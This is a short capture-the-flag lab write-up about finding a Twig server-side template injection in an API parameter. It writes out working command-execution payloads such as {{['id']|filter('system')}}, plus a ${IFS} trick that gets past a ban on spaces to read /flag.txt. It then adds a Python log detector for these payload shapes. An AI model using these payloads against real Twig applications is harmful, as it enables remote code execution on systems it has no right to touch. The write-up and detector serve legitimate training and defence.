Skills Assessment
Obtain the flag.
And they don't give us shit.
We can see a normal, basic website without any injectable field, but if we intercept the request for the main home page, we can see it:

On the API call, try SSRF and SSTI

Lol, I will try another method to find out whether it is Twig or Jinja2 -->

Okay, it is Twig, now test LFI payloads -->

If we URL-encode the spaces, we get an error, so we need to find another method to insert the spaces, for example deleting them or using ${IFS} -->
{{['id']|filter('system')}}

{{['cat${IFS}/flag.txt']|filter('system')}}
Use ${IFS}
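
For the defending side, both payloads above leave a recognizable shape in request logs: a template expression whose filter argument names a PHP command-execution function, with ${IFS} standing in for spaces. The following detector is an added example, not part of the original writeup; the /api path, the id parameter name and the sample request lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# PHP functions that run OS commands; a template filter should never be handed one.
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

EXPR = re.compile(r"\{\{(.*?)\}\}", re.S)                       # {{ ... }} expression
FILTER_ARG = re.compile(r"\|\s*(\w+)\s*\(\s*['\"](\w+)['\"]")   # |name('callable'
IFS = re.compile(r"\$\{IFS\}|\$IFS\b")                          # shell stand-in for a space

# Constructed request lines: the page's two payloads URL-encoded, plus a benign one.
SAMPLES = [
    "GET /api?id=%7B%7B%5B%27id%27%5D%7Cfilter(%27system%27)%7D%7D HTTP/1.1",
    "GET /api?id=%7B%7B%5B%27cat%24%7BIFS%7D/flag.txt%27%5D%7Cfilter(%27system%27)%7D%7D HTTP/1.1",
    "GET /api?id=42 HTTP/1.1",
]


def inspect_value(value):
    """Return the list of findings for one decoded parameter value."""
    findings = []
    for expr in EXPR.findall(value):
        findings.append("template-expression")
        for _name, arg in FILTER_ARG.findall(expr):
            if arg.lower() in EXEC_FUNCS:
                findings.append("exec-callable:" + arg.lower())
        if IFS.search(expr):
            findings.append("ifs-space-evasion")
    return findings


def scan_request_line(line):
    """Parse 'METHOD target HTTP/x' and inspect every query parameter."""
    parts = line.split()
    if len(parts) < 2:
        return {}
    hits = {}
    for name, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again so double-encoded input is inspected too.
        found = inspect_value(unquote_plus(value))
        if found:
            hits[name] = found
    return hits


if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan_request_line(sample) or "clean")
```

A match on "ifs-space-evasion" inside a template expression is the stronger signal, since ordinary application input has no reason to carry a shell variable in that position.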